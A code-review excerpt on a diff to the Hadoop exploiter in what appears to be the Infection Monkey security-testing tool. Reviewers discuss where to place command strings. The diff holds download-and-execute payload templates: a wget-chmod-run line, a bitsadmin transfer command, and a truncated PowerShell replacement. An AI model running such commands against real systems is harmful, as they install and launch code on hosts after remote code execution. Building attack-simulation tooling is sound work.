monkey/infection_monkey/exploit/hadoop.py

```diff
@@ -29,9 +29,18 @@ class HadoopExploiter(WebRCE):
                     "&& wget -O %(monkey_path)s %(http_path)s " \
                     "; chmod +x %(monkey_path)s " \
                     "&&  %(monkey_path)s %(monkey_type)s %(parameters)s"
+
+    """ Command was observed to be unreliable, we use powershell instead
     WINDOWS_COMMAND = "cmd /c if NOT exist %(monkey_path)s bitsadmin /transfer" \
                       " Update /download /priority high %(http_path)s %(monkey_path)s " \
                       "& %(monkey_path)s %(monkey_type)s %(parameters)s"
+    """
+
+    WINDOWS_COMMAND = "powershell -NoLogo -Command \"if (!(Test-Path '%(monkey_path)s')) { " \
```

Comment:
Why aren't we moving this to be with the other commands under `model\__init__py`?

Reply:
Seemed too hadoop specific to be elsewhere.

Reply:
I don't think it's that specific